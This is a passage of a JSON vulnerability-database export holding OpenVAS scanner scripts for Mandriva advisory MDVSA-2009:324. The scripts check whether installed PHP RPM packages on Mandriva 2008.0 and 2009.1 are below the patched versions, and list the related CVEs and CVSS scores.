isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-optimizer\", rpm:\"php-optimizer~0.1~0.alpha1.5.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", rpm:\"php-pdo_odbc~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.11~0.2mdv2009.1\", 
rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sasl\", rpm:\"php-sasl~0.1.0~25.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ssh2\", rpm:\"php-ssh2~0.11.0~2.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-suhosin\", 
rpm:\"php-suhosin~0.9.29~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sybase\", rpm:\"php-sybase~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tclink\", rpm:\"php-tclink~3.4.4~10.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-translit\", rpm:\"php-translit~0.6.0~7.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-vld\", rpm:\"php-vld~0.9.1~8.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xattr\", rpm:\"php-xattr~1.1.0~6.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xdebug\", rpm:\"php-xdebug~2.0.5~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zip\", rpm:\"php-zip~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.11~0.2mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3546", "CVE-2009-3558", "CVE-2009-1271", "CVE-2009-4018", "CVE-2009-2687", "CVE-2009-3292", "CVE-2008-7068", "CVE-2009-4017", "CVE-2009-3291", "CVE-2009-3293", "CVE-2009-3557"], "description": "The remote host is missing an update to php\nannounced via advisory MDVSA-2009:324.", "modified": "2017-07-06T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:66420", "href": "http://plugins.openvas.org/nasl.php?oid=66420", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:324 (php)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_324.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:324 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed with this update, please\nvisit the referenced security advisories.\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nThis update provides a solution to these vulnerabilities.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. 
The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:324\";\ntag_summary = \"The remote host is missing an update to php\nannounced via advisory MDVSA-2009:324.\";\n\n \n\nif(description)\n{\n script_id(66420);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-1271\", \"CVE-2009-2687\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\", \"CVE-2009-3546\", \"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:324 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libphp5_common5\", rpm:\"libphp5_common5~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-bz2\", rpm:\"php-bz2~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-calendar\", rpm:\"php-calendar~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cgi\", rpm:\"php-cgi~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ctype\", rpm:\"php-ctype~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-curl\", rpm:\"php-curl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dbase\", rpm:\"php-dbase~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-devel\", 
rpm:\"php-devel~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-dom\", rpm:\"php-dom~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-exif\", rpm:\"php-exif~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-fcgi\", rpm:\"php-fcgi~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-filter\", rpm:\"php-filter~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ftp\", rpm:\"php-ftp~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gettext\", rpm:\"php-gettext~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-gmp\", rpm:\"php-gmp~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-hash\", rpm:\"php-hash~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-iconv\", rpm:\"php-iconv~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ini\", rpm:\"php-ini~5.2.4~1.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-json\", rpm:\"php-json~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.2.4~3.6mdv2008.0\", 
rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mcrypt\", rpm:\"php-mcrypt~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mhash\", rpm:\"php-mhash~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mime_magic\", rpm:\"php-mime_magic~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ming\", rpm:\"php-ming~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mssql\", rpm:\"php-mssql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-mysqli\", rpm:\"php-mysqli~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-openssl\", rpm:\"php-openssl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pcntl\", rpm:\"php-pcntl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_dblib\", rpm:\"php-pdo_dblib~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_mysql\", rpm:\"php-pdo_mysql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_odbc\", 
rpm:\"php-pdo_odbc~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_pgsql\", rpm:\"php-pdo_pgsql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pdo_sqlite\", rpm:\"php-pdo_sqlite~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pgsql\", rpm:\"php-pgsql~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-posix\", rpm:\"php-posix~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-pspell\", rpm:\"php-pspell~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-readline\", rpm:\"php-readline~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-recode\", rpm:\"php-recode~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-session\", rpm:\"php-session~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-shmop\", rpm:\"php-shmop~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-simplexml\", rpm:\"php-simplexml~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-snmp\", rpm:\"php-snmp~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-soap\", rpm:\"php-soap~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sockets\", rpm:\"php-sockets~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sqlite\", rpm:\"php-sqlite~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isrpmvuln(pkg:\"php-suhosin\", rpm:\"php-suhosin~0.9.22~1.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvmsg\", rpm:\"php-sysvmsg~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvsem\", rpm:\"php-sysvsem~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-sysvshm\", rpm:\"php-sysvshm~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tidy\", rpm:\"php-tidy~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-tokenizer\", rpm:\"php-tokenizer~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-wddx\", rpm:\"php-wddx~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xml\", rpm:\"php-xml~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlreader\", rpm:\"php-xmlreader~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlrpc\", rpm:\"php-xmlrpc~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xmlwriter\", rpm:\"php-xmlwriter~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-xsl\", rpm:\"php-xsl~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php-zlib\", rpm:\"php-zlib~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64php5_common5\", rpm:\"lib64php5_common5~5.2.4~3.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not 
vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3546", "CVE-2009-3558", "CVE-2009-1271", "CVE-2009-4018", "CVE-2009-2687", "CVE-2009-3292", "CVE-2008-7068", "CVE-2009-4017", "CVE-2009-3291", "CVE-2009-3293", "CVE-2009-3557"], "description": "The remote host is missing an update to php\nannounced via advisory MDVSA-2009:324.", "modified": "2018-04-06T00:00:00", "published": "2009-12-10T00:00:00", "id": "OPENVAS:136141256231066420", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066420", "type": "openvas", "title": "Mandriva Security Advisory MDVSA-2009:324 (php)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_324.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:324 (php)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed with this update, please\nvisit the referenced security advisories.\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nThis update provides a solution to these vulnerabilities.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:324\";\ntag_summary = \"The remote host is missing an update to php\nannounced via advisory MDVSA-2009:324.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66420\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2008-7068\", \"CVE-2009-1271\", \"CVE-2009-2687\", \"CVE-2009-3291\", \"CVE-2009-3292\", \"CVE-2009-3293\", \"CVE-2009-3546\", \"CVE-2009-3557\", \"CVE-2009-3558\", \"CVE-2009-4017\", \"CVE-2009-4018\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:324 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
